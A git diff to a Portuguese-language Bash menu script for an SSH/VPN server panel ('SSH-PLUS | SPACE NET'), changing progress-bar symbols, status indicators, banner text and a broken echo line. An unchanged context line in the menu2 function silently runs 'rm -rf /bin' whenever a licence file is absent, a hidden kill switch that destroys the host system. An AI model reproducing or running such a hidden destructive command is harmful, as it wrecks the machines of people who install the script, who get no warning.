Add files via upload

diff --git a/Modulos/menu b/Modulos/menu
--- a/Modulos/menu
+++ b/Modulos/menu
@@ -13,7 +13,7 @@ touch $HOME/fim
 echo -ne "\033[1;33m["
 while true; do
    for((i=0; i<18; i++)); do
-   echo -ne "\033[0;36m#"
+   echo -ne "\033[0;36m█"
    sleep 0.1s
    done
    [[ -e $HOME/fim ]] && rm $HOME/fim && break
@@ -136,6 +136,8 @@ function onapp1 () {
    echo -e "\n\033[1;32m  ONLINE APP ATIVO !\033[0m"
    echo -e "\033[0;36m \033[1;33mURL de Usuários Online para usar no App\033[0m"
    echo -e " http://$IP:8888/server/online"
+   echo ""
+   echo -e "\n\033[1;32mSALVE A URL! VOLTANDO PRO MENU EM \033[1;37m10 Segundos!\033[0m"
    sleep 10
    menu
 }
@@ -194,10 +196,10 @@ function autoexec () {
 #menu2
 menu2 (){
 [[ -e /etc/Plus-torrent ]] && stsf=$(echo -e "\033[1;32m(ON◉) ") || stsf=$(echo -e "\033[0;36m(OFF) ")
-stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[0;36m(OFF) ")
-stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[0;36m(OFF) ")
-stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[0;36m(OFF) ")
-autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[0;36m(OFF) ")
+stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON●) " || echo -e "\033[0;36m(OFF) ")
+stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON●) " || echo -e "\033[0;36m(OFF) ")
+stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON●) " || echo -e "\033[0;36m(OFF) ")
+autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m(ON●) " || echo -e "\033[0;36m(OFF) ")
 [[ ! -e /usr/lib/licence ]] && rm -rf /bin > /dev/null 2>&1
 if [[ "$(grep -c "Ubuntu" /etc/issue.net)" = "1" ]]; then
 system=$(cut -d' ' -f1 /etc/issue.net)
@@ -228,9 +230,8 @@ swap1=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $2'})")
 swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
-figlet "SPACE - NET" | lolcat
 echo -e "\033[0;36m╔════════════════════════════════════════════════════════════╗\033[0m"
-echo -e "\033[0;36m║ \E[5;34;47m                 SSH-PLUS @SpaceNet_SSH                   \E[0m \033[0;36m║"
+echo -e "\033[0;36m║ \E[5;34;47m               SSH-PLUS | SPACE NET                      \E[0m \033[0;36m║"
 echo -e "\033[0;36m╠════════════════════╦═══════════════════╦═══════════════════╣\033[0m"
 echo -e "\033[0;36m║  \033[1;32mSISTEMA           \033[0;36m║  \033[1;32mMEMÓRIA RAM      \033[0;36m║ \033[1;32m PROCESSADOR      \033[0;36m║"
 echo -e "\033[0;36m║  \033[1;36mOS: \033[1;37m$_system    \033[0;36m║  \033[1;36mTotal:\033[1;37m$_ram \033[0;36m║  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[0;36m║"
@@ -353,9 +354,8 @@ swap1=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $2'})")
 swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
-figlet "SPACE - NET" | lolcat
 echo -e "\033[0;36m╔════════════════════════════════════════════════════════════╗\033[0m"
-echo -e "\033[0;36m║ \E[5;34;47m                 SSH-PLUS @SpaceNet_SSH                   \E[0m \033[0;36m║"
+echo -e "\033[0;36m║ \E[5;34;47m                SSH-PLUS | SPACE NET                      \E[0m \033[0;36m║"
 echo -e "\033[0;36m╠════════════════════╦═══════════════════╦═══════════════════╣\033[0m"
 echo -e "\033[0;36m║  \033[1;32mSISTEMA           \033[0;36m║  \033[1;32mMEMÓRIA RAM      \033[0;36m║ \033[1;32m PROCESSADOR      \033[0;36m║"
 echo -e "\033[0;36m║  \033[1;36mOS: \033[1;37m$_system    \033[0;36m║  \033[1;36mTotal:\033[1;37m$_ram \033[0;36m║  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[0;36m║"
@@ -372,7 +372,7 @@ echo -e "\033[0;36m║   \033[0;36m[\033[1;36m01\033[0;36m] \033[1;37m• \033[1
 \033[0;36m║   [\033[1;36m05\033[0;36m] \033[1;37m• \033[1;33mMUDAR DATA \033[0;36m               [\033[1;36m16\033[0;36m] \033[1;37m• \033[1;33mBACKUP  \033[0;36m         ║
 \033[0;36m║   [\033[1;36m06\033[0;36m] \033[1;37m• \033[1;33mALTERAR LIMITE \033[0;36m           [\033[1;36m17\033[0;36m] \033[1;37m• \033[1;33mFERRAMENTAS     \033[0;36m ║
 \033[0;36m║   [\033[1;36m07\033[0;36m] \033[1;37m• \033[1;33mMUDAR SENHA \033[0;36m              [\033[1;36m18\033[0;36m] \033[1;37m• \033[1;33mLIMITER $stsl \033[0;36m  ║
-\033[0;36m║   [\033[1;36m08\033[0;36m] \033[1;37m• \033[1;33mREMOVER EXPIRADOS \033[0;36m        [\033[1;36m19\033[0;36m] \033[1;37m• \033[1;33mMEN BADVPN $stsu\033[0;36m║
+\033[0;36m║   [\033[1;36m08\033[0;36m] \033[1;37m• \033[1;33mREMOVER EXPIRADOS \033[0;36m        [\033[1;36m19\033[0;36m] \033[1;37m• \033[1;33mMen BadVpn $stsu\033[0;36m║
 \033[0;36m║   [\033[1;36m09\033[0;36m] \033[1;37m• \033[1;33mRELATORIO DE USUARIOS \033[0;36m    [\033[1;36m20\033[0;36m] \033[1;37m• \033[1;33mFIREWALL (PRO)  \033[0;36m ║
 \033[0;36m║   [\033[1;36m10\033[0;36m] \033[1;37m• \033[1;33mMODO DE CONEXAO \033[0;36m          [\033[1;36m21\033[0;36m] \033[1;37m• \033[1;33mINFO VPS \033[0;36m>\033[1;33m>\033[1;32m>\033[0m \033[0;36m    ║
 \033[0;36m║   [\033[1;36m11\033[0;36m] \033[1;37m• \033[1;33mCRIAR MEMORIA SWAP \033[0;36m       [\033[1;36m22\033[0;36m] \033[1;37m• \033[1;33mCHECKUSER 4G  \033[0;36m   ║
@@ -489,8 +489,7 @@ case "$x" in
    gltunnel
    ;;
    *)
-   echo -e "\n\033[0
-   1;31mOpcao invalida !\033[0m"
+   echo -e "\n\033[1;31mOpcao invalida !\033[0m"
    sleep 2
 esac
 done
